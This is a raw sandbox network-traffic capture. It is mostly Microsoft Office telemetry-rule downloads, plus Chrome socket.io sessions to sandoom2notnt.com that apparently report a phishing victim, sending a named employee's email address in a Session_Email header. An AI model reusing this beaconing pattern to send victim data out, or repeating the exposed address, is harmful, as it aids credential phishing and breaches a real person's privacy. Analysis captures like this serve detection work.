                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                              ETag: "0x8DC582BDF1E2608"
                                                                              x-ms-request-id: a6d15796-a01e-00ab-7f80-269106000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064946Z-16849878b78z5q7jpbgf6e9mcw0000000afg000000005cbn
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache-Info: L1_T2
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:46 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              138192.168.2.44989413.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:46 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:46 UTC563INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:46 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 1403
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                              ETag: "0x8DC582BDCDD6400"
                                                                              x-ms-request-id: fbe9264b-c01e-0046-04f3-242db9000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064946Z-r197bdfb6b4mcssrvu34xzqc5400000001sg000000004csf
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:46 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              139192.168.2.44989713.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:46 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:47 UTC584INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:46 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 1399
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                              ETag: "0x8DC582BE8C605FF"
                                                                              x-ms-request-id: c3d8694b-101e-0046-45a3-2691b0000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064946Z-16849878b78smng4k6nq15r6s4000000038g0000000026ah
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache-Info: L1_T2
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:47 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              140192.168.2.449899188.114.97.34435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:46 UTC774OUTPOST /socket.io/?EIO=4&transport=polling&t=PB7beRs&sid=JMhweoIWN1gqZtHIAAXf HTTP/1.1
                                                                              Host: sandoom2notnt.com
                                                                              Connection: keep-alive
                                                                              Content-Length: 2
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              Auth_UID: USER09102024U44100921
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Content-type: text/plain;charset=UTF-8
                                                                              Accept: */*
                                                                              Session_Email: gulamrasul.chepuwala@cevalogistics.com
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Origin: https://rieg.riegriegrieg.com
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Referer: https://rieg.riegriegrieg.com/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-26 06:49:46 UTC2OUTData Raw: 34 30
                                                                              Data Ascii: 40
                                                                              2024-10-26 06:49:47 UTC818INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:47 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Access-Control-Allow-Origin: *
                                                                              cache-control: no-store
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nuz4TIB%2BJi%2B14oDizCVtruDwoqfMAnSVcj6y1xtZF8bmYH5qtW7t7f4WeMUhLPwx1o82eH8%2ByFp%2BA0J4EJtQ3WUkrohwz1A4wys47NxP1wI6%2BTh7bjC%2FN%2FK51vPmv6mVRqzMVw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8d888224eccef168-CDG
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=115839&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1376&delivery_rate=24987&cwnd=32&unsent_bytes=0&cid=2ad3c1535b6e6f76&ts=500&x=0"
                                                                              2024-10-26 06:49:47 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                              Data Ascii: 2ok
                                                                              2024-10-26 06:49:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              141192.168.2.449898188.114.97.34435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:46 UTC714OUTGET /socket.io/?EIO=4&transport=polling&t=PB7beRv&sid=JMhweoIWN1gqZtHIAAXf HTTP/1.1
                                                                              Host: sandoom2notnt.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              Accept: */*
                                                                              Auth_UID: USER09102024U44100921
                                                                              Session_Email: gulamrasul.chepuwala@cevalogistics.com
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Origin: https://rieg.riegriegrieg.com
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Referer: https://rieg.riegriegrieg.com/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-26 06:49:48 UTC821INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:48 GMT
                                                                              Content-Type: text/plain; charset=UTF-8
                                                                              Content-Length: 32
                                                                              Connection: close
                                                                              Access-Control-Allow-Origin: *
                                                                              cache-control: no-store
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qDsZoFYm9tXnYlpW4rEVfG46QJ8kHC%2BTNUrNlBhFnvx%2BrIT0yUa4MERqmOWITV8xhrZnVT%2BMpAAOxAHNSDxFN3KEVLc%2B76XlFEGyTtZ9LhbA3V8idi6npZpFFuoAE3oIxSC4QQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8d888224f8421c7d-AMS
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=123163&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1292&delivery_rate=23502&cwnd=32&unsent_bytes=0&cid=314eb5dfcf157ceb&ts=1540&x=0"
                                                                              2024-10-26 06:49:48 UTC32INData Raw: 34 30 7b 22 73 69 64 22 3a 22 2d 66 30 69 4b 34 43 77 73 54 77 77 74 69 5a 6a 41 41 58 67 22 7d
                                                                              Data Ascii: 40{"sid":"-f0iK4CwsTwwtiZjAAXg"}


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              142192.168.2.449896188.114.97.34435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:46 UTC385OUTGET /socket.io/?EIO=4&transport=polling&t=PB7bdZX HTTP/1.1
                                                                              Host: sandoom2notnt.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-26 06:49:47 UTC824INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:47 GMT
                                                                              Content-Type: text/plain; charset=UTF-8
                                                                              Content-Length: 118
                                                                              Connection: close
                                                                              Access-Control-Allow-Origin: *
                                                                              cache-control: no-store
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=htU9Y8WrNC4MWUPBuBrj%2BfO0%2FOTVywYWYeGhc9%2FHCoxl5nU41kwXYeKqypF0rByEp7Cm4WRBG3MDC202IcepkVVKlNGa%2Fj8Mtiwtw%2FGRmRfpTuQqul%2B12FUGD5QCsCc3ivtyPA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8d888224fe0a0100-AMS
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=122853&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=963&delivery_rate=23574&cwnd=32&unsent_bytes=0&cid=bd8b2defdc562bcb&ts=749&x=0"
                                                                              2024-10-26 06:49:47 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 71 2d 65 49 45 6a 50 55 43 76 4a 5f 46 78 6f 63 41 41 58 68 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                                              Data Ascii: 0{"sid":"q-eIEjPUCvJ_FxocAAXh","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              143192.168.2.44990013.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:47 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:47 UTC563INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:47 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 1403
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                              ETag: "0x8DC582BDC2EEE03"
                                                                              x-ms-request-id: f1436c55-a01e-001e-41ef-2549ef000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064947Z-16849878b78qg9mlz11wgn0wcc000000015000000000fk5s
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:47 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              144192.168.2.44990113.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:47 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:47 UTC584INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:47 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 1362
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                              ETag: "0x8DC582BDF497570"
                                                                              x-ms-request-id: 7b68ac53-d01e-0082-7e67-27e489000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064947Z-16849878b78qf2gleqhwczd21s00000001w0000000008v3s
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              X-Cache-Info: L1_T2
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:47 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              145192.168.2.44990213.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:47 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:47 UTC584INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:47 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 1399
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                              ETag: "0x8DC582BE1CC18CD"
                                                                              x-ms-request-id: baa41b4f-401e-00ac-2c28-210a97000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064947Z-16849878b7898p5f6vryaqvp5800000002gg000000007p92
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache-Info: L1_T2
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:47 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              146192.168.2.44990313.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:47 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:47 UTC563INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:47 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 1366
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                              ETag: "0x8DC582BEA414B16"
                                                                              x-ms-request-id: e014a2e3-501e-0035-060b-22c923000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064947Z-16849878b78x6gn56mgecg60qc00000003c000000000ht0q
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:47 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              147192.168.2.44990413.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:47 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:47 UTC584INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:47 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 1362
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                              ETag: "0x8DC582BEB256F43"
                                                                              x-ms-request-id: 4113dc96-c01e-008e-5a2a-277381000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064947Z-16849878b78xblwksrnkakc08w00000000y0000000007e5b
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              X-Cache-Info: L1_T2
                                                                              Accept-Ranges: bytes
